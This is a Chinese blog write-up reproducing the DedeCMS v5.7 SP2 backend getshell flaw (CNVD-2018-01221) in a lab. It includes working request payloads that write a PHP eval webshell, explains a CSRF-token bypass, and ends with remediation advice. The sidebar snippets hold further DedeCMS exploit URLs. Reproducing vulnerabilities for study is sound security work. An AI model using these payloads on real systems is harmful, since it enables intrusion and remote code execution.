dedeCMS后台上传getshell漏洞(CNVD-2018-01221)复现

最新推荐文章于 2024-06-11 21:38:27 发布
最新推荐文章于 2024-06-11 21:38:27 发布
阅读量1.5k 收藏 6
点赞数 2
分类专栏: 漏洞复现 文章标签: dedecms后台 CNVD-2018-01221
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44897902/article/details/102768536
版权

漏洞名:
CNVD-2018-01221

影响:
Dedecms v5.7 sp2

危害:
任意代码执行,getshell;

准备工作:
win7虚拟机+Dedecms v5.7 sp2+phpstudy
首先安装Dedecms v5.7 sp2:

http://www.dedecms.com

下载安装之后直接访问localhost/Dedecms v5.7 sp2/uploads
会自动跳到安装界面,输入数据库信息,全部默认配置就行
然后进行后台登录,默认账号是admin,密码是admin
在这里插入图片描述
复现过程:

payload:
域名/tpl.php?action=savetagfile&token=&filename=abc.lib.php&content=<?php @eval($_POST['xxx'])?>
中国菜刀连接地址为:
http://192.168.91.141/DedeCMS-V5.7-UTF8-SP2/uploads/include/taglib/abc.lib.php

在这里插入图片描述

原理分析:

通过开源的漏洞知道漏洞发生点在/uploads/dede/tpl.php 打开tpl.php查看源码,这是漏洞发生的地方: 
else if($action=='savetagfile')
{
    csrf_check();
    if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))
    {
        ShowMsg('文件名不合法,不允许进行操作!', '-1');
        exit();
    }
    require_once(DEDEINC.'/oxwindow.class.php');
    $tagname = preg_replace("#\.lib\.php$#i", "", $filename);
    $content = stripslashes($content);
    $truefile = DEDEINC.'/taglib/'.$filename;
    $fp = fopen($truefile, 'w');
    fwrite($fp, $content);
    fclose($fp);
    ...
    exit();
}

从以上源码可以得出信息:
我们传入的action参数如果为savetagfile的话,那么就会进行crsf_check函数的检验
crsf_check:

function csrf_check()
{
    global $token;

    if(!isset($token) || strcasecmp($token, $_SESSION['token']) != 0){
        echo '<a href="http://bbs.dedecms.com/907721.html">DedeCMS:CSRF Token Check Failed!</a>';
        exit;
    }
}

这是对session进行检验,需要绕过if,就说明需要设置token,并且需要token的值为session;而在tpl.php中只有当action=upload的时候才会获取session:

else if ($action == 'upload')
{
    require_once(dirname(__FILE__).'/../include/oxwindow.class.php');
    $acdir = str_replace('.', '', $acdir);
    $win = new OxWindow();
    make_hash();
    $win->Init("tpl.php","js/blank.js","POST' enctype='multipart/form-data' ");
    $win->mainTitle = "模块管理";
    $wecome_info = "<a href='templets_main.php'>模板管理</a> &gt;&gt; 上传模板";
    $win->AddTitle('请选择要上传的文件:');
    $win->AddHidden("action",'uploadok');
    $msg = "
    <table width='600' border='0' cellspacing='0' cellpadding='0'>
  <tr>
    <td width='96' height='60'>请选择文件:</td>
    <td width='504'>
        <input name='acdir' type='hidden' value='$acdir'  />
        <input name='token' type='hidden' value='{$_SESSION['token']}'  />
        <input name='upfile' type='file' id='upfile' style='width:380px' />
      </td>
  </tr>
 </table>
    ";
    $win->AddMsgItem("<div style='padding-left:20px;line-height:150%'>$msg</div>");
    $winform = $win->GetWindow('ok','');
    $win->Display();
    exit();
}

所以我们先让action=upload,查看源码得到session:
在这里插入图片描述
在这里插入图片描述这样可以构造:token=0f94451b9ba02137db944f04d87bc8ec来进行crsf_check的绕过
tpl.php告诉我们要上传的参数有:action,token,filename,content
并且filename要有.lib和.php,并且生成文件路径在/taglib/下,也就是uploads\include\taglib下
所以会构造payload:

url/uploads/dede/tpl.php?action=savetagfile&token=yoursession&filename=1.lib.php&content=<?php eval($_POST['cmd']);?>

漏洞补救:

1.将tpl.php里面action=upload那一部分改为:

<td width='96' height='60'>请选择文件:</td>
    <td width='504'>
        <input name='acdir' type='hidden' value='$acdir'  />
        <input name='token' type='hidden' value=''  />//将这里的{$_SESSION['token']}删除
        <input name='upfile' type='file' id='upfile' style='width:380px' />
      </td>
  </tr>

这样找不到session,就会被crsf_check检验出来,但是这样的安全性也不高;
2.其实上传可执行文件这个功能就挺危险的,但是又非要使用这个功能;那就对用户输入进行过滤,尝试进行过滤危险字段或者危险标签(但是总有绕过的方法)
3.可以尝试将上传文件的名字修改为随机数,这样的安全性相对高一点。

ring4ring
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 864
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
dedeCMS后台代码执行漏洞-CNVD-2018-01221
飞鱼的企鹅的博客
06-20 1961
复现的第一个漏洞CNVD-2018-01221DeDeCMS简介 织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞(CNVD-2021-09650)——漏洞复现
最新发布
2301_76437855的博客
06-11 515
锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。公开日期:2021-09-19漏洞编号:CNVD-2021-09650危害等级:高危漏洞描述:锐捷NBR路由器存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
DedeCMS V5.7 SP2 后台代码执行漏洞-CNVD-2018-01221
WFC1006848997的博客
02-06 1301
织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。 首先我们先去官网下载DedeCMS V5.7 SP2 下载网址:http://www.dedecms.com/products/dedecms/downloads/ 源代码版本:DeDeCMS V5....
DedeCMS V5.7 SP2存在代码执行漏洞分析(CNVD-2018-01221
wednesday的博客
07-15 528
该问题是一个由任意文件上传带来的代码执行漏洞,由于本身要求上传php结尾文件,再加上未对上传文件内容进行检查,所以导致了该漏洞漏洞产生在/dede/tpl.php,由此可见要利用该漏洞你得登录进后台。问题产生在代码251行开始。代码详解如下图 漏洞复现: 前提是你得通过其他方法进入到dede的后台,比如弱口令啥的。 然后由上述图片中csrf_check()函数会校验token,所以我们得先获取到token。 要怎么才能获取到token呢?我们再去tpl.php里看一下,发现ac
DedeCms5.7后台任意文件上传 getshell
抚琴
01-07 710
DedeCms5.7后台任意文件上传 getshell 上传的木马为 <?php @eval($_POST[1]);?> 使用蚁剑连接 拿到shell 代码在我博客里关注即可下载
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
Dedecms代码执行(cnvd-2018-01221)
m0_65150886的博客
02-02 287
织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。2.访问http://ip:port/dede/login.php,进入后台登录页面。1.访问http://ip:port,出现如下页面,开始实验。5.蚁剑连接,getshell。1.禁止此处写入文件。4.访问上传文件路径。
DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞
arthur2612的博客
01-07 466
DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞 1、漏洞利用 由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码。 又由于应用没有对管理员的来源页进行任何检查,只是检查了管理员是否登陆,从而造成了CSRF漏洞。 因此可以诱导管理员以管理员的权限写入代码即可。 测试版本:DedeCMS...
DedeCMS V5.7文件上传漏洞复现
weixin_51047454的博客
03-20 1265
CVE-2018-20129-DedeCMS V5.7 SP2前台文件上传漏洞复现 登录管理页面后,开启会员功能(默认是关闭的) 回到首页,用户登录后,点击会员中心。 打开内容中心(第一次进入会提示完善个人信息,完善一下,不然不能操作) 重点开始 4. 发表文章的表单最下方有一个图片的图标,点击可以选择上传图片到服务端。 制作图片码 上传 抓包修改文件后缀:p*hp 连接,成功 代码审计 为什么用.ph%p就可以绕过检测了?我们来看看源码中的问题部分。 找到图片的校验部分的源
dedecms织梦上传漏洞怎么修复
09-05 252
漏洞DedeCMS V5.7 SP2正式版(2018-01-09) 已经修复过,已经你的织梦程序已经是这个版本的话,可以忽略以下修复教程,不放心的可以打开文件对比一下。自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了该漏洞,云盾依然报告存在漏洞,遇到该情况可选择忽略该漏洞提示。打开 /include/uploadsafe.inc.php 找到 40至43行。dedecms过滤逻辑不严导致上传漏洞dedecms上传漏洞
[漏洞复现]dedeCMS V5.7 SP2后台代码执行(CNVD-2018-01221)
Vicl1fe的博客
02-19 678
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/yuzly/p/11326571.html 源码网址: http://www.dedecms.com/products/dedecms/downloads/ 漏洞概述 需要以管理员权限登录后台。在tpl.php中savefile行为没有进行严格的过滤 ...
织梦漏洞
showso2006的专栏
09-06 1018
<br />最近网站被人挂马,360狂报,真的很影响网站形象。<br />经检查,原来是织梦的模板机制漏洞,只要利用织梦的会员管理功能,发表文章,上传一个带有gif89a的欺骗图片,再访问那篇文章即可以执行脚本代码。然后实现上传木马脚本到网站,就可以为所欲为。<br /> <br />另外,即使你清除了木马,用360检查还是会报警的,只有等360再次检查时发现没问题,才会清除报警。如果要快,可以使用360的验证码嵌入到网站,登录自己的账号,点击验证,大概需要在半小时之后才会再次检查。
Dedecms织梦远程写文件漏洞
鸥鹭忘机
07-28 963
基本信息 漏洞编号:SSV-89354 CVE-ID:CVE-2015-4553 漏洞类别:变量覆盖 实验版本:dedecms v5.7SP1(部分版本已修复) 利用条件:Apache,dedecms版本为v5.7SP且未修复,自备一台云主机 云主机ip:192.168.18.131 参考文章:http://blog.nsfocus.net/dedecms-write-file-vuln/ https://seclists.org/fulldisclosure/2015/Jun/47 2015年6月17日
dedecms最新版本存在远程包含漏洞--可getshell
pygain的博客
11-01 2247
小编最近发现,9月中旬发布的织梦CMS,由于管理员疏忽易存在远程包含漏洞,可getshell
cnvd-2018-04757
09-19
CNVD-2018-04757是一个公开的漏洞编号,指的是中国国家信息安全漏洞库于2018年发布的第4757个漏洞。由于题目中没有提供具体的漏洞细节,因此无法给出具体的回答。根据CNVD的惯例,漏洞编号通常会包括漏洞的详细描述...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值